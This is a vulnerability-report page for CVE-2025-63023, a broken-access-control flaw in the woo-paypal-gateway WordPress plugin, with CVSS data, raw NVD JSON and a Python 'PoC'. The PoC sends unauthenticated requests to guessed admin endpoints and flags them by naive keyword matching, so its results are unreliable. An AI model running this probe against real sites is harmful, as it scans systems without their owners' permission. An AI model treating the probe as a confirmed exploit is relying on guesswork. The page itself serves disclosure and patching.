Security Vulnerability Report
中文
CVE-2025-63023 CVSS 5.3 MEDIUM

CVE-2025-63023

Published: 2025-12-09 16:18:07
Last Modified: 2026-04-27 19:16:18

Description

Missing Authorization vulnerability in Easy Payment Payment Gateway for PayPal on WooCommerce woo-paypal-gateway allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Payment Gateway for PayPal on WooCommerce: from n/a through <= 9.0.53.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

woo-paypal-gateway <= 9.0.53

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-63023 Missing Authorization PoC # Target: Payment Gateway for PayPal on WooCommerce (<= 9.0.53) import requests import sys TARGET_URL = "https://example.com" # Replace with target URL def test_unauthorized_access(): """ Test for missing authorization vulnerability in woo-paypal-gateway This PoC attempts to access admin functionality without authentication """ # Common admin AJAX endpoints that should require authentication endpoints_to_test = [ "/wp-admin/admin-ajax.php", "/wp-json/wpgw/v1/settings", # If REST API exists "/wp-admin/admin.php?page=wc-settings&tab=checkout&section=wpgw_paypal", ] print(f"[*] Testing CVE-2025-63023: Missing Authorization in woo-paypal-gateway") print(f"[*] Target: {TARGET_URL}") for endpoint in endpoints_to_test: url = f"{TARGET_URL}{endpoint}" # Request without authentication cookies headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Content-Type": "application/x-www-form-urlencoded", } try: # Test unauthenticated access response = requests.get(url, headers=headers, timeout=10, verify=False) # Check if response indicates successful unauthorized access if response.status_code == 200: # Check for sensitive data exposure or successful operation if "paypal" in response.text.lower() or "settings" in response.text.lower(): print(f"[+] VULNERABLE: {endpoint} - Allows unauthorized access") print(f"[+] Response length: {len(response.text)} bytes") else: print(f"[*] Possible: {endpoint} - Status {response.status_code}") elif response.status_code == 403: print(f"[-] Protected: {endpoint} - Returns 403 Forbidden") else: print(f"[*] Status: {endpoint} - {response.status_code}") except requests.RequestException as e: print(f"[!] Error testing {endpoint}: {e}") print("\n[*] Testing complete. If vulnerable endpoints found, update to latest version.") print("[*] Recommended: Upgrade woo-paypal-gateway to version > 9.0.53") if __name__ == "__main__": test_unauthorized_access()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63023", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:07.127", "lastModified": "2026-04-27T19:16:18.473", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Easy Payment Payment Gateway for PayPal on WooCommerce woo-paypal-gateway allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Payment Gateway for PayPal on WooCommerce: from n/a through <= 9.0.53."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woo-paypal-gateway/vulnerability/wordpress-payment-gateway-for-paypal-on-woocommerce-plugin-9-0-52-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}